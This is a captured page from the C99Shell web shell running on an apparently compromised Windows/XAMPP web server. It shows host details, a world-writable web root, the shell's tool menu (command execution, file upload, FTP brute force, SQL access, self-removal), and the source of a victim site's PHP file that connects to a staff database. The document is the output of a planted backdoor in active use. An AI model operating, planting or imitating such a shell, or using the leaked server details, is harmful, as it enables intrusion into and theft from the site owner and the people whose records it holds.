!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\   drwxrwxrwx
Free 7.98 GB of 239.26 GB (3.33%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     lanzamiento_web.php (1.53 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php require_once('../dama/Connections/cndama.php'); ?>
<?php
mysql_select_db
($database_cndama$cndama);
$query_rsPlanta "select id, Apellidos, Nombres from nueva_2006_planta order by Apellidos";
$rsPlanta mysql_query($query_rsPlanta$cndama) or die(mysql_error());
$row_rsPlanta mysql_fetch_assoc($rsPlanta);
$totalRows_rsPlanta mysql_num_rows($rsPlanta);
?>
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<table width="500" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><form name="form1" method="post" action="">
        Confirmaci&oacute;n de asistencia al relanzamiento de nuestra p&aacute;gina 
        web, el pr&oacute;ximo jueves 24 de agosto a las 10:00 a.m. en la sala 
        Oriol Rancel del Planetario Distrital. 
        <p></p>
        <br>
        <br>
        <br>
        <br>
        <table width="400" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td width="200">Nombre</td>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td width="200">&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td width="200">&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
          <tr>
            <td width="200">&nbsp;</td>
            <td>&nbsp;</td>
          </tr>
        </table>
      </form></td>
  </tr>
</table>
</body>
</html>
<?php
mysql_free_result
($rsPlanta);
?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--